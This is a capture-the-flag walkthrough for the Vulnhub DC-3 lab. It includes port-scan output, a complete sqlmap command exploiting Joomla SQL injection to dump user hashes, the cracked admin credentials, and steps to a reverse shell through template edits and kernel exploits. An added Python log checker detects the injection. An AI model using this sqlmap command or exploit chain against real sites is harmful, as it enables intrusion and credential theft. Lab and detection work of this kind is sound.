2021-04-13 01:38:10 +05:00


Vulnhub-DC 3

Rustscan


rustscan -a 192.168.1.10 -- -A -sC -sV
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy           :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Open 192.168.1.10:80

PORT   STATE SERVICE REASON         VERSION
80/tcp open  http    syn-ack ttl 64 Apache httpd 2.4.18 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: 1194D7D32448E1F90741A97B42AF91FA
|_http-generator: Joomla! - Open Source Content Management
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Home
MAC Address: 08:00:27:99:17:ED (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4

PORT 80 (HTTP)

This is a Joomla CMS, which can be identified if you have the Wappalyzer extension installed.

So I ran dirsearch but found nothing interesting.

I went to Google for any exploits available for Joomla and found one Metasploit module.

But this exploit didn't work.

So I searched again for exploits and came across an SQL injection for Joomla.

After some time it came back with the databases.

Now let's select the joomladb database and see its tables.

It will start to retrieve the tables from the database.

Now we are interested in the users table.

I tried to enumerate the columns in the table but couldn't.

Then I went with guessing the column name to be name, and it returned an entry in the table, so the next column could be password.

sqlmap -u "http://192.168.1.10/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p 'list[fullordering]' -D 'joomladb' --tables -T '#__users' --columns -C name,password --dump --batch
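Since the injection above rides in the `list[fullordering]` parameter, a defender can look for it in the web server's access log. The following Python checker is an added example, not part of the original writeup: it parses Apache combined-format lines (the sample lines are constructed, not captured from this box) and flags any `list[fullordering]` value that is not a plain `<column> ASC|DESC` sort or that names `updatexml`/`extractvalue`.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed Apache combined-format log lines (not from the original writeup).
# Line 1 carries a function call in list[fullordering], line 3 a stray quote; lines 2 and 4 are normal traffic.
SAMPLE_LOG = """\
192.168.1.5 - - [13/Apr/2021:01:20:11 +0500] "GET /index.php?option=com_fields&view=fields&layout=modal&list%5Bfullordering%5D=updatexml%281%2C1%2C1%29 HTTP/1.1" 500 1234 "-" "Mozilla/5.0"
192.168.1.7 - - [13/Apr/2021:01:21:02 +0500] "GET /index.php?option=com_content&view=article&id=1 HTTP/1.1" 200 5678 "-" "Mozilla/5.0"
192.168.1.5 - - [13/Apr/2021:01:21:30 +0500] "GET /index.php?option=com_fields&view=fields&list%5Bfullordering%5D=a.name%27 HTTP/1.1" 500 1234 "-" "Mozilla/5.0"
192.168.1.9 - - [13/Apr/2021:01:22:05 +0500] "GET /administrator/index.php?option=com_fields&view=fields&list%5Bfullordering%5D=a.name%20ASC HTTP/1.1" 200 4321 "-" "Mozilla/5.0"
"""

# Apache "combined" format: client ident user [time] "METHOD TARGET PROTO" status bytes "referer" "agent"
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})')
# Joomla's list ordering should be "<column> ASC|DESC"; allowlisting that shape beats chasing payload signatures.
BENIGN_ORDERING = re.compile(r'^[A-Za-z0-9_.]+(\s+(ASC|DESC))?$', re.IGNORECASE)
# The function name seeded in the writeup's sqlmap command is flagged even when it arrives without parentheses.
SQL_FUNCTION_NAMES = ("updatexml", "extractvalue")

def suspicious_orderings(line):
    """Return (client_ip, decoded_value, reason) for each list[fullordering] value that is not a plain sort."""
    m = LOG_RE.match(line)
    if m is None:  # not a combined-format line, skip it
        return []
    # parse_qs decodes %5B/%5D in the parameter name and the percent-encoding in its value
    params = parse_qs(urlsplit(m.group("target")).query, keep_blank_values=True)
    hits = []
    for value in params.get("list[fullordering]", []):
        if any(name in value.lower() for name in SQL_FUNCTION_NAMES):
            hits.append((m.group("ip"), value, "sql function name in ordering"))
        elif not BENIGN_ORDERING.match(value.strip()):
            hits.append((m.group("ip"), value, "ordering is not '<column> ASC|DESC'"))
    return hits

def scan_log(text):
    """Run the check over a whole log and return all alerts in order."""
    return [hit for line in text.splitlines() for hit in suspicious_orderings(line)]

if __name__ == "__main__":
    for ip, value, reason in scan_log(SAMPLE_LOG):
        print(f"{ip}: {reason}: {value!r}")
```

Because the writeup's sqlmap run used `--random-agent`, the user-agent string is not a useful signal here; the parameter value is.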

The hash looks like bcrypt, so let's try cracking it with john.

We can now log in to Joomla with admin:snoopy.

To get a reverse shell, go to Extensions -> Templates

and edit the error.php file.

Now you just need to navigate to that file, /templates/beez3/error.php.

But this didn't work, so let's try adding a simple command injection parameter.

Now we have RCE; we just need to get a reverse shell.

We have a shell, great! So now let's run linpeas.

Right off the bat it shows that it's using an old Linux kernel, so there is an exploit available.

Download and transfer the exploit to the target machine; make sure to convert it to Unix format using dos2unix.

After compiling and running it, it didn't work.

I searched again for an exploit and found one.

After running it, it crashed :|

Then I found another exploit.

We just need to run compile.sh and after that run the doubleput binary.